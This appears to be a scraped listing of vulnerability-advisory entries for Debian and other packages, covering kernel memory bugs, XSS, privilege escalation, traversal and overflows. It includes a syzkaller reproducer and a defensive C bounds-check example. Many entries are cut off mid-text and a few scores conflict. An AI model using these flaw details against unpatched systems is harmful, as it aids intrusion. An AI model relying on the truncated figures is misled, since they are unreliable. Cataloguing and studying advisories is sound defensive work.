SciTokens C++ is a minimal library for creating and using SciTokens from C or C++. Prior to version 1.4.1, scitokens-cpp is vulnerable to an authorization bypass when processing path-based scopes in tokens. The library normalizes the scope path from the token before authorization and collapses ".." path components instead of rejecting them. As a result, an attacker can use parent-directory traversal in the scope claim to broaden the effective authorization beyond the intended directory. This issue has been patched in version 1.4.1.
Source : NVD
Score 8.3
Published March 31, 2026
Severity HIGH
CNA Score 8.3
Affected Technologies
Linux Debian
Echo
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV R
## CVE-2025-40905 [HIGH, CVSS 7.3]: Linux Debian vulnerability analysis and mitigation (Wiz)
WWW::OAuth 1.000 and earlier for Perl uses the rand() function as the default source of entropy, which is not cryptographically secure, for cryptographic functions.
Source : NVD
Score 7.3
Published February 13, 2026
Severity HIGH
CNA Score 7.3
Affected Technologies
Linux Debian
Echo
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 17.8
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
libwww-oauth-perl
Sources
NVD
Debian 11, 12 Severity MEDIUM No Fix Added at: Feb 15, 2026
Debian 13, 14 Severity HIGH Has Fix Added at: Feb 15, 2026
Echo Severity HIGH Has Fix Added at: Feb 15, 2026
## CVE-2025-59029 [MEDIUM, CVSS 5.3]: Linux Debian vulnerability analysis and mitigation (Wiz)
An attacker can trigger an assertion failure by requesting crafted DNS records, waiting for them to be inserted into the records cache, then sending a query with qtype set to ANY.
Source : NVD
Score 5.3
Published December 9, 2025
Severity MEDIUM
CNA Score 5.3
Affected Technologies
Linux Debian
Linux Alpine
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 1
Exploitation Probability (EPSS) N/A
Affected packages and libraries
pdns-recursor
Sources
NVD
Alpine 3.23 Severity MEDIUM Has Fix Added at: Dec 14, 2025
Alpine edge Severity MEDIUM Has Fix Added at: Dec 09, 2025
Debian 11, 12, 13 No Fix Added at: Dec 09, 2
## CVE-2026-23350 [HIGH, CVSS 7.8]: Linux Debian vulnerability analysis and mitigation (Wiz)
In the Linux kernel, the following vulnerability has been resolved:
drm/xe/queue: Call fini on exec queue creation fail
Every call to queue init should have a corresponding fini call.
Skipping this would mean skipping removal of the queue from GuC list
(which is part of guc_id allocation). A damaged queue stored in
exec_queue_lookup list would lead to invalid memory reference,
sooner or later.
Call fini to free guc_id. This must be done before any internal
LRCs are freed.
Since the finalization with this extra call became very similar to
__xe_exec_queue_fini(), reuse that. To make this reuse possible,
alter xe_lrc_put() so it can survive NULL parameters, like other
similar functions.
v2: Reuse _xe_exec_queue_fini
## CVE-2026-23438: Linux Debian vulnerability analysis and mitigation (Wiz)
In the Linux kernel, the following vulnerability has been resolved:
net: mvpp2: guard flow control update with global_tx_fc in buffer switching
mvpp2_bm_switch_buffers() unconditionally calls
mvpp2_bm_pool_update_priv_fc() when switching between per-cpu and
shared buffer pool modes. This function programs CM3 flow control
registers via mvpp2_cm3_read()/mvpp2_cm3_write(), which dereference
priv->cm3_base without any NULL check.
When the CM3 SRAM resource is not present in the device tree (the
third reg entry added by commit 60523583b07c ("dts: marvell: add CM3
SRAM memory to cp11x ethernet device tree")), priv->cm3_base remains
NULL and priv->global_tx_fc is false. Any operation that triggers
mvpp2_bm_switch_buffers
## CVE-2026-2443 [MEDIUM, CVSS 5.3]: Linux Debian vulnerability analysis and mitigation (Wiz)
A flaw was identified in libsoup, a widely used HTTP library in GNOME-based systems. When processing specially crafted HTTP Range headers, the library may improperly validate requested byte ranges. In certain build configurations, this could allow a remote attacker to access portions of server memory beyond the intended response. Exploitation requires a vulnerable configuration and access to a server using the embedded SoupServer component.
Source : NVD
Score 5.3
Published February 13, 2026
Severity MEDIUM
CNA Score 5.3
Affected Technologies
Linux Debian
Linux Red Hat
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPS
## CVE-2025-71067: Linux Debian vulnerability analysis and mitigation (Wiz)
In the Linux kernel, the following vulnerability has been resolved:
ntfs: set dummy blocksize to read boot_block when mounting
When mounting, sb->s_blocksize is used to read the boot_block without
being defined or validated. Set a dummy blocksize before attempting to
read the boot_block.
The issue can be triggered with the following syz reproducer:
mkdirat(0xffffffffffffff9c, &(0x7f0000000080)='./file1\x00', 0x0)
r4 = openat$nullb(0xffffffffffffff9c, &(0x7f0000000040), 0x121403, 0x0)
ioctl$FS_IOC_SETFLAGS(r4, 0x40081271, &(0x7f0000000980)=0x4000)
mount(&(0x7f0000000140)=@nullb, &(0x7f0000000040)='./cgroup\x00',
&(0x7f0000000000)='ntfs3\x00', 0x2208004, 0x0)
syz_clone(0x88200200, 0x0, 0x0, 0x0, 0x0, 0x0)
Here, the
## CVE-2026-27456 [MEDIUM, CVSS 4.7]: Linux Debian vulnerability analysis and mitigation (Wiz)
util-linux is a random collection of Linux utilities. Prior to version 2.41.4, a TOCTOU (Time-of-Check-Time-of-Use) vulnerability has been identified in the SUID binary /usr/bin/mount from util-linux. The mount binary, when setting up loop devices, validates the source file path with user privileges via fork() + setuid() + realpath(), but subsequently re-canonicalizes and opens it with root privileges (euid=0) without verifying that the path has not been replaced between both operations. Neither O_NOFOLLOW, nor inode comparison, nor post-open fstat() are employed. This allows a local unprivileged user to replace the source file with a symlink pointing to any root-owned file or device during the race window, causing th
## CVE-2022-50837 [MEDIUM, CVSS 5.3]: Linux Debian vulnerability analysis and mitigation (Wiz)
In the Linux kernel, the following vulnerability has been resolved:
net: dsa: tag_8021q: avoid leaking ctx on dsa_tag_8021q_register() error path
If dsa_tag_8021q_setup() fails, for example due to the inability of the
device to install a VLAN, the tag_8021q context of the switch will leak.
Make sure it is freed on the error path.
Source : NVD
Published December 30, 2025
CNA Score N/A
Affected Technologies
Linux Debian
Linux Ubuntu
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 7.4
Exploitation Probability (EPSS) N/A
Affected packages and libraries
linux-hwe-5.15
linux-intel-iotg-5.15
Sources
NVD
Debian 12, 13,
## CVE-2026-2705 (CVSS 5.3, MEDIUM): Linux Debian vulnerability analysis and mitigation
A vulnerability was detected in Open Babel up to 3.1.1. The impacted element is the function OBAtom::SetFormalCharge in the library include/openbabel/atom.h of the component MOL2 File Handler. The manipulation results in out-of-bounds read. It is possible to launch the attack remotely. The exploit is now public and may be used. The patch is identified as e23a224b8fd9d7c2a7cde9ef4ec6afb4c05aa08a. A patch should be applied to remediate this issue. The project was informed of the problem early through an issue report but has not responded yet.
Source : NVD
Score 5.3
Published February 19, 2026
Severity MEDIUM
CNA Score 5.3
Affected Technologies
Linux Debian
Echo
Has Public Exploit Yes
## CVE-2025-6927 (CVSS 2.3, LOW): Linux Debian vulnerability analysis and mitigation
Vulnerability in Wikimedia Foundation MediaWiki. This vulnerability is associated with program files includes/specials/pagers/BlockListPager.Php, includes/api/ApiQueryBlocks.Php.
This issue affects MediaWiki: from >= 1.42.0 before 1.39.13, 1.42.7, 1.43.2, 1.44.0.
Source : NVD
Score 2.3
Published February 2, 2026
Severity LOW
CNA Score 2.3
Affected Technologies
Linux Debian
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 7
Exploitation Probability (EPSS) N/A
Affected packages and libraries
mediawiki
Sources
NVD
Debian 11, 12 No Fix Added at: Jul 03, 2025
Debian 13 Has Fix Added at: Jul 03, 2025
Debian 14 Ha
## CVE-2025-52204 (CVSS 6.1, MEDIUM): Linux Debian vulnerability analysis and mitigation
A Cross-Site Scripting (XSS) vulnerability exists in Znuny::ITSM 6.5.x in the customer.pl endpoint via the OTRSCustomerInterface parameter
Source : NVD
Score 6.1
Published March 23, 2026
Severity MEDIUM
CNA Score 6.1
Affected Technologies
Linux Debian
Echo
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 9.5
Exploitation Probability (EPSS) N/A
Affected packages and libraries
znuny
Sources
NVD
Debian 12, 13 Severity MEDIUM No Fix Added at: Mar 29, 2026
Debian 14 Severity MEDIUM Has Fix Added at: Mar 29, 2026
Echo Severity MEDIUM No Fix Added at: Mar 29, 2026
## CVE-2025-71221 (CVSS 7.0, HIGH): Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
dmaengine: mmp_pdma: Fix race condition in mmp_pdma_residue()
Add proper locking in mmp_pdma_residue() to prevent use-after-free when
accessing descriptor list and descriptor contents.
The race occurs when multiple threads call tx_status() while the tasklet
on another CPU is freeing completed descriptors:
CPU 0 CPU 1
mmp_pdma_tx_status()
mmp_pdma_residue()
-> NO LOCK held
list_for_each_entry(sw, ..)
DMA interrupt
dma_do_tasklet()
-> spin_lock(&desc_lock)
list_move(sw->node, ...)
spin_unlock(&desc_lock)
| dma_pool_free(sw) access sw->desc 1).
Fix by protecting the chain_running list iteration and descriptor access
with the chan->desc_lock spinloc
## CVE-2026-4897 (CVSS 5.3, MEDIUM): Linux Debian vulnerability analysis and mitigation
polkit-agent-helper-1
Source : NVD
Score 5.5
Published March 26, 2026
Severity MEDIUM
CNA Score 5.5
Affected Technologies
Linux Debian
Linux Fedora
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 2.7
Exploitation Probability (EPSS) N/A
Affected packages and libraries
polkit-debugsource
polkit-devel
Sources
NVD
Debian 11, 12, 13, 14 Severity MEDIUM No Fix Added at: Mar 29, 2026
Echo Severity MEDIUM No Fix Added at: Mar 29, 2026
Red Hat 6, 7, 8, 9, 10 Severity MEDIUM No Fix Added at: Mar 29, 2026
## CVE-2026-23372 (CVSS 7.8, HIGH): Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
nfc: rawsock: cancel tx_work before socket teardown
In rawsock_release(), cancel any pending tx_work and purge the write
queue before orphaning the socket. rawsock_tx_work runs on the system
workqueue and calls nfc_data_exchange which dereferences the NCI
device. Without synchronization, tx_work can race with socket and
device teardown when a process is killed (e.g. by SIGKILL), leading
to use-after-free or leaked references.
Set SEND_SHUTDOWN first so that if tx_work is already running it will
see the flag and skip transmitting, then use cancel_work_sync to wait
for any in-progress execution to finish, and finally purge any
remaining queued skbs.
## CVE-2026-0988 (CVSS 3.7, LOW): Linux Debian vulnerability analysis and mitigation
A flaw was found in glib. Missing validation of offset and count parameters in the g_buffered_input_stream_peek() function can lead to an integer overflow during length calculation. When specially crafted values are provided, this overflow results in an incorrect size being passed to memcpy(), triggering a buffer overflow. This can cause application crashes, leading to a Denial of Service (DoS).
Source : NVD
Score 3.7
Published January 21, 2026
Severity LOW
CNA Score 3.7
Affected Technologies
Linux Debian
Linux Ubuntu
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 20.9
Exploitation Probability (EPSS) 0.1
## CVE-2026-0398 (CVSS 5.3, MEDIUM): Linux Debian vulnerability analysis and mitigation
Crafted zones can lead to increased resource usage and crafted CNAME chains can lead to cache poisoning in Recursor.
Source : NVD
Score 5.3
Published February 9, 2026
Severity MEDIUM
CNA Score 5.3
Affected Technologies
Linux Debian
Linux Alpine
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 0.2
Exploitation Probability (EPSS) N/A
Affected packages and libraries
pdns-recursor
Sources
NVD
Alpine 3.23, edge Severity MEDIUM Has Fix Added at: Feb 11, 2026
Debian 11, 12 Severity MEDIUM No Fix Added at: Feb 10, 2026
Debian 13, 14 Severity MEDIUM Has Fix Added at: Feb 10, 2026
Echo Severity MEDIUM Has Fix Added
## CVE-2026-24027 (CVSS 5.3, MEDIUM): Linux Debian vulnerability analysis and mitigation
Crafted zones can lead to increased incoming network traffic.
Source : NVD
Score 5.3
Published February 9, 2026
Severity MEDIUM
CNA Score 5.3
Affected Technologies
Linux Debian
Linux Alpine
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 0.3
Exploitation Probability (EPSS) N/A
Affected packages and libraries
pdns-recursor
Sources
NVD
Alpine 3.23, edge Severity MEDIUM Has Fix Added at: Feb 11, 2026
Debian 11, 12 Severity MEDIUM No Fix Added at: Feb 10, 2026
Debian 13, 14 Severity MEDIUM Has Fix Added at: Feb 10, 2026
Echo Severity MEDIUM Has Fix Added at: Feb 10, 2026
## CVE-2026-33554 (CVSS 7.5, HIGH): Linux Debian vulnerability analysis and mitigation
ipmi-oem in FreeIPMI before 1.16.17 has exploitable buffer overflows on response messages. The Intelligent Platform Management Interface (IPMI) specification defines a set of interfaces for platform management. It is implemented by a large number of hardware manufacturers to support system management. It is most commonly used for sensor reading (e.g., CPU temperatures through the ipmi-sensors command within FreeIPMI) and remote power control (the ipmipower command). The ipmi-oem client command implements a set of a IPMI OEM commands for specific hardware vendors. If a user has supported hardware, they may wish to use the ipmi-oem command to send a request to a server to retrieve specific information. Three subcommands
## CVE-2025-71121 (CVSS 5.5, MEDIUM): Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
parisc: Do not reprogram affinitiy on ASP chip
The ASP chip is a very old variant of the GSP chip and is used e.g. in
HP 730 workstations. When trying to reprogram the affinity it will crash
with a HPMC as the relevant registers don't seem to be at the usual
location. Let's avoid the crash by checking the sversion. Also note,
that reprogramming isn't necessary either, as the HP730 is a just a
single-CPU machine.
Source : NVD
Score 5.5
Published January 14, 2026
Severity MEDIUM
CNA Score N/A
Affected Technologies
Linux Debian
Linux Ubuntu
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
## CVE-2026-33250 (CVSS 7.5, HIGH): Linux Debian vulnerability analysis and mitigation
Freeciv21 is a free open source, turn-based, empire-building strategy game. Versions prior to 3.1.1 crash with a stack overflow when receiving specially-crafted packets. A remote attacker can use this to take down any public server. A malicious server can use this to crash the game on the player's machine. Authentication is not needed and, by default, logs do not contain any useful information. All users should upgrade to Freeciv21 version 3.1.1. Running the server behind a firewall can help mitigate the issue for non-public servers. For local games, Freeciv21 restricts connections to the current user and is therefore not affected.
Source : NVD
Score 7.5
Published March 24, 2026
Severity HIGH
CNA Score 7.5
## CVE-2026-23408 (CVSS 7.8, HIGH): Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
apparmor: Fix double free of ns_name in aa_replace_profiles()
if ns_name is NULL after
1071 error = aa_unpack(udata, &lh, &ns_name);
and if ent->ns_name contains an ns_name in
1089 } else if (ent->ns_name) {
then ns_name is assigned the ent->ns_name
1095 ns_name = ent->ns_name;
however ent->ns_name is freed at
1262 aa_load_ent_free(ent);
and then again when freeing ns_name at
1270 kfree(ns_name);
Fix this by NULLing out ent->ns_name after it is transferred to ns_name
Source : NVD
Score 7.8
Published April 1, 2026
Severity HIGH
CNA Score 7.8
Affected Technologies
Linux Debian
Linux Ubuntu
Has Public Exploit Yes
## CVE-2026-22797 (CVSS 9.9, CRITICAL): Linux Debian vulnerability analysis and mitigation
An issue was discovered in OpenStack keystonemiddleware 10.5 through 10.7 before 10.7.2, 10.8 and 10.9 before 10.9.1, and 10.10 through 10.12 before 10.12.1. The external_oauth2_token middleware fails to sanitize incoming authentication headers before processing OAuth 2.0 tokens. By sending forged identity headers such as X-Is-Admin-Project, X-Roles, or X-User-Id, an authenticated attacker may escalate privileges or impersonate other users. All deployments using the external_oauth2_token middleware are affected.
Source : NVD
Score 9.9
Published January 19, 2026
Severity CRITICAL
CNA Score 9.9
Affected Technologies
Linux Debian
Linux Ubuntu
Has Public Exploit No
Has CISA KEV Exploit No
## CVE-2026-23288 (CVSS 7.8, HIGH): Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
accel/amdxdna: Fix out-of-bounds memset in command slot handling
The remaining space in a command slot may be smaller than the size of
the command header. Clearing the command header with memset() before
verifying the available slot space can result in an out-of-bounds write
and memory corruption.
Fix this by moving the memset() call after the size validation.
Source : NVD
Score 7.8
Published March 25, 2026
Severity HIGH
CNA Score 7.8
Affected Technologies
Linux Debian
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 4.1
## CVE-2026-27895 (CVSS 4.3, MEDIUM): Linux Debian vulnerability analysis and mitigation
LDAP Account Manager (LAM) is a webfrontend for managing entries (e.g. users, groups, DHCP settings) stored in an LDAP directory. Prior to version 9.5, the PDF export component does not correctly validate uploaded file extensions. This way any file type (including .php files) can be uploaded. With GHSA-w7xq-vjr3-p9cf, an attacker can achieve remote code execution as the web server user. Version 9.5 fixes the issue. Although upgrading is recommended, a workaround would be to make /var/lib/ldap-account-manager/config read-only for the web-server user.
Source : NVD
Score 8.8
Published March 18, 2026
Severity HIGH
CNA Score 4.3
Affected Technologies
Linux Debian
Echo
Has Public Exploit No
## CVE-2022-50725: Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
media: vidtv: Fix use-after-free in vidtv_bridge_dvb_init()
KASAN reports a use-after-free:
BUG: KASAN: use-after-free in dvb_dmxdev_release+0x4d5/0x5d0 [dvb_core]
Call Trace:
...
dvb_dmxdev_release+0x4d5/0x5d0 [dvb_core]
vidtv_bridge_probe+0x7bf/0xa40 [dvb_vidtv_bridge]
platform_probe+0xb6/0x170
...
Allocated by task 1238:
...
dvb_register_device+0x1a7/0xa70 [dvb_core]
dvb_dmxdev_init+0x2af/0x4a0 [dvb_core]
vidtv_bridge_probe+0x766/0xa40 [dvb_vidtv_bridge]
...
Freed by task 1238:
dvb_register_device+0x6d2/0xa70 [dvb_core]
dvb_dmxdev_init+0x2af/0x4a0 [dvb_core]
vidtv_bridge_probe+0x766/0xa40 [dvb_vidtv_bridge]
...
It is because the error handling i
## CVE-2025-40931 (CVSS 9.1, CRITICAL): Linux Debian vulnerability analysis and mitigation
Apache::Session::Generate::MD5 versions through 1.94 for Perl create insecure session id.
Apache::Session::Generate::MD5 generates session ids insecurely. The default session id generator returns a MD5 hash seeded with the built-in rand() function, the epoch time, and the PID. The PID will come from a small set of numbers, and the epoch time may be guessed, if it is not leaked from the HTTP Date header. The built-in rand function is unsuitable for cryptographic usage. Predicable session ids could allow an attacker to gain access to systems.
Source : NVD
Score 9.1
Published March 5, 2026
Severity CRITICAL
CNA Score 9.1
Affected Technologies
Linux Debian
Echo
Has Public Exploit No
## CVE-2026-26345 (CVSS 8.6, HIGH): Linux Debian vulnerability analysis and mitigation
SPIP before 4.4.8 contains a stored cross-site scripting (XSS) vulnerability in the public area triggered in certain edge-case usage patterns. The echapper_html_suspect() function does not adequately sanitize user-controlled content, allowing authenticated users with content-editing privileges (e.g., author-level roles and above) to inject malicious scripts. The injected payload may be rendered across multiple pages within the framework and execute in the browser context of other users, including administrators. Successful exploitation can allow attackers to perform actions in the security context of the victim user, including unauthorized modification of application state. This vulnerability is not mitigated by the S
## CVE-2026-23424 (CVSS 5.3, MEDIUM): Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
accel/amdxdna: Validate command buffer payload count
The count field in the command header is used to determine the valid
payload size. Verify that the valid payload does not exceed the remaining
buffer space.
Source : NVD
Published April 3, 2026
CNA Score N/A
Affected Technologies
Linux Debian
Linux Ubuntu
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 4
Exploitation Probability (EPSS) N/A
Affected packages and libraries
linux-azure-fips
linux-fips
Sources
NVD
Debian 14 Has Fix Added at: Apr 05, 2026
Ubuntu 16.04, 18.04, 20.04 Severity MEDIU
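Three entries on this page share one check-ordering mistake: CVE-2026-0988 (glib) forms offset + count in a length calculation that can wrap before the memcpy(), CVE-2026-23288 (amdxdna) memset()s a command header before confirming the slot has room for it, and CVE-2026-23424 (amdxdna) trusts a submitter-controlled count without comparing it to the remaining buffer. The following is an added C example, not glib or kernel code: `struct slot`, `struct cmd_hdr`, `slot_push` and the two range predicates are hypothetical, modelled loosely on the descriptions, and show the vulnerable check shape beside the overflow-safe one on a constructed 64-byte slot.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define SLOT_SIZE 64u

/* Hypothetical command header and slot: a fixed-size slot, a write cursor,
 * a header that is cleared before use, and a submitter-controlled count. */
struct cmd_hdr {
    uint32_t count;   /* payload bytes the submitter claims follow the header */
    uint32_t opcode;
};

struct slot {
    uint8_t data[SLOT_SIZE];
    size_t  used;     /* bytes already occupied; invariant: used <= SLOT_SIZE */
};

/* The vulnerable check shape (glib entry): form offset + count in size_t and
 * compare the sum. Past SIZE_MAX the sum wraps to a small value, the check
 * passes, and the memcpy() that follows is handed a length that runs off the
 * buffer. This only evaluates the predicate; it touches no memory. */
int unsafe_range_ok(size_t size, size_t offset, size_t count)
{
    return offset + count <= size;
}

/* Overflow-safe shape: never form the sum. Each comparison uses values
 * bounded by size, so nothing can wrap. */
int safe_range_ok(size_t size, size_t offset, size_t count)
{
    return offset <= size && count <= size - offset;
}

/* Append a command in the order the amdxdna fixes establish: space checks for
 * the header and for `count` payload bytes first, memset()/memcpy() only
 * afterwards. Returns bytes written, or 0 on rejection with the slot untouched. */
size_t slot_push(struct slot *s, const struct cmd_hdr *h, const uint8_t *payload)
{
    if (s->used > SLOT_SIZE)                 /* corrupted cursor: refuse */
        return 0;
    size_t remaining = SLOT_SIZE - s->used;
    if (remaining < sizeof *h)               /* header does not fit: do not clear it */
        return 0;
    if (h->count > remaining - sizeof *h)    /* payload exceeds the rest of the slot */
        return 0;

    uint8_t *p = s->data + s->used;
    memset(p, 0, sizeof *h);                 /* now provably inside the slot */
    memcpy(p, h, sizeof *h);
    memcpy(p + sizeof *h, payload, h->count);
    s->used += sizeof *h + h->count;
    return sizeof *h + h->count;
}

/* Constructed scenario; returns 0 when every expectation holds:
 *  1: 4 bytes free, 8-byte header: refused before the memset()
 *  2: fresh slot, count exactly fills it: accepted, slot full
 *  3: full slot, any further command: refused
 *  4: fresh slot, count one past the end: refused, cursor unchanged
 *  5/6: the size_t wraparound is accepted by the unsafe predicate only */
int demo_bounds(void)
{
    uint8_t payload[SLOT_SIZE];
    memset(payload, 0xAB, sizeof payload);   /* constructed payload bytes */
    struct cmd_hdr h = { .count = 0, .opcode = 1 };
    struct slot s = { .used = SLOT_SIZE - 4 };

    if (slot_push(&s, &h, payload) != 0 || s.used != SLOT_SIZE - 4) return 1;

    s.used = 0;
    h.count = SLOT_SIZE - sizeof h;
    if (slot_push(&s, &h, payload) != SLOT_SIZE || s.used != SLOT_SIZE) return 2;

    h.count = 0;
    if (slot_push(&s, &h, payload) != 0) return 3;

    s.used = 0;
    h.count = SLOT_SIZE - sizeof h + 1;
    if (slot_push(&s, &h, payload) != 0 || s.used != 0) return 4;

    if (!unsafe_range_ok(SLOT_SIZE, SIZE_MAX - 1, 4)) return 5;  /* wrongly accepted */
    if (safe_range_ok(SLOT_SIZE, SIZE_MAX - 1, 4)) return 6;     /* correctly refused */
    return 0;
}

int main(void)
{
    int rc = demo_bounds();
    printf("bounds demo: %s (%d)\n", rc == 0 ? "ok" : "FAILED", rc);
    return rc;
}
```

The wraparound case is the one reviewers most often miss: `offset + count <= size` reads as a bounds check, but with offset near SIZE_MAX the sum is 2, the check passes, and the copy length is still the attacker's count. Comparing count against `size - offset` after confirming `offset <= size` cannot wrap.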
## CVE-2016-20041 (CVSS 8.6, HIGH): Echo vulnerability analysis and mitigation
Yasr 0.6.9-5 contains a buffer overflow vulnerability that allows local attackers to crash the application or execute arbitrary code by supplying an oversized argument to the -p parameter. Attackers can invoke yasr with a crafted payload containing junk data, shellcode, and a return address to overwrite the stack and trigger code execution.
Source : NVD
Score 8.6
Published March 28, 2026
Severity HIGH
CNA Score 8.6
Affected Technologies
Echo
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 6
Exploitation Probability (EPSS) N/A
Affected packages and libraries
yasr
Sources
NVD
Echo Severity HIGH No Fix Added at: Mar
## CVE-2025-68370 (CVSS 5.3, MEDIUM): Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
coresight: tmc: add the handle of the event to the path
The handle is essential for retrieving the AUX_EVENT of each CPU and is
required in perf mode. It has been added to the coresight_path so that
dependent devices can access it from the path when needed.
The existing bug can be reproduced with:
perf record -e cs_etm//k -C 0-9 dd if=/dev/zero of=/dev/null
Showing an oops as follows:
Unable to handle kernel paging request at virtual address 000f6e84934ed19e
Call trace:
tmc_etr_get_buffer+0x30/0x80 [coresight_tmc] (P)
catu_enable_hw+0xbc/0x3d0 [coresight_catu]
catu_enable+0x70/0xe0 [coresight_catu]
coresight_enable_path+0xb0/0x258 [coresight]
## CVE-2023-53829: Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
f2fs: flush inode if atomic file is aborted
Let's flush the inode being aborted atomic operation to avoid stale dirty
inode during eviction in this call stack:
f2fs_mark_inode_dirty_sync+0x22/0x40 [f2fs]
f2fs_abort_atomic_write+0xc4/0xf0 [f2fs]
f2fs_evict_inode+0x3f/0x690 [f2fs]
? sugov_start+0x140/0x140
evict+0xc3/0x1c0
evict_inodes+0x17b/0x210
generic_shutdown_super+0x32/0x120
kill_block_super+0x21/0x50
deactivate_locked_super+0x31/0x90
cleanup_mnt+0x100/0x160
task_work_run+0x59/0x90
do_exit+0x33b/0xa50
do_group_exit+0x2d/0x80
__x64_sys_exit_group+0x14/0x20
do_syscall_64+0x3b/0x90
entry_SYSCALL_64_after_hwframe+0x63/0xcd
This triggers f2fs_bug_o
## CVE-2025-61655 (CVSS 5.3, MEDIUM): Linux Debian vulnerability analysis and mitigation
Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Wikimedia Foundation VisualEditor. This vulnerability is associated with program files includes/ApiVisualEditorEdit.Php, modules/ve-mw/init/targets/ve.Init.Mw.DesktopArticleTarget.Js, modules/ve-mw/ui/dialogs/ve.Ui.MWSaveDialog.Js.
This issue affects VisualEditor: from * before 1.39.14, 1.43.4, 1.44.1.
Source : NVD
Published February 3, 2026
Severity NONE
CNA Score N/A
Affected Technologies
Linux Debian
Echo
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 12.9
Exploitation Probability (EPSS) N/A
## CVE-2025-61653 (CVSS 2.7, LOW): Linux Debian vulnerability analysis and mitigation
Vulnerability in Wikimedia Foundation TextExtracts. This vulnerability is associated with program files includes/ApiQueryExtracts.Php.
This issue affects TextExtracts: from * before 1.39.14, 1.43.4, 1.44.1.
Source : NVD
Score 2.7
Published February 3, 2026
Severity LOW
CNA Score 2.7
Affected Technologies
Linux Debian
Echo
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 24.9
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
mediawiki
Sources
NVD
Debian 11, 12, 13, 14 Has Fix Added at: Oct 03, 2025
Echo Has Fix Added at: Nov 18, 2025
## CVE-2025-71230 (CVSS 5.5, MEDIUM): Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
hfs: ensure sb->s_fs_info is always cleaned up
When hfs was converted to the new mount api a bug was introduced by
changing the allocation pattern of sb->s_fs_info. If setup_bdev_super()
fails after a new superblock has been allocated by sget_fc(), but before
hfs_fill_super() takes ownership of the filesystem-specific s_fs_info
data it was leaked.
Fix this by freeing sb->s_fs_info in hfs_kill_super().
Source : NVD
Score 5.5
Published February 18, 2026
Severity MEDIUM
CNA Score N/A
Affected Technologies
Linux Debian
Linux Ubuntu
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
## CVE-2026-23453 (CVSS 5.3, MEDIUM): Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
net: ti: icssg-prueth: Fix memory leak in XDP_DROP for non-zero-copy mode
Page recycling was removed from the XDP_DROP path in emac_run_xdp() to
avoid conflicts with AF_XDP zero-copy mode, which uses xsk_buff_free()
instead.
However, this causes a memory leak when running XDP programs that drop
packets in non-zero-copy mode (standard page pool mode). The pages are
never returned to the page pool, leading to OOM conditions.
Fix this by handling cleanup in the caller, emac_rx_packet().
When emac_run_xdp() returns ICSSG_XDP_CONSUMED for XDP_DROP, the
caller now recycles the page back to the page pool. The zero-copy
path, emac_rx_packet_zc() already h
## CVE-2026-5037 (CVSS 5.3, MEDIUM): Linux Debian vulnerability analysis and mitigation
A vulnerability was determined in mxml up to 4.0.4. This issue affects the function index_sort of the file mxml-index.c of the component mxmlIndexNew. Executing a manipulation of the argument tempr can lead to stack-based buffer overflow. The attack is restricted to local execution. The exploit has been publicly disclosed and may be utilized. This patch is called 6e27354466092a1ac65601e01ce6708710bb9fa5. A patch should be applied to remediate this issue.
Source : NVD
Score 4.8
Published March 29, 2026
Severity MEDIUM
CNA Score 4.8
Affected Technologies
Linux Debian
Echo
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
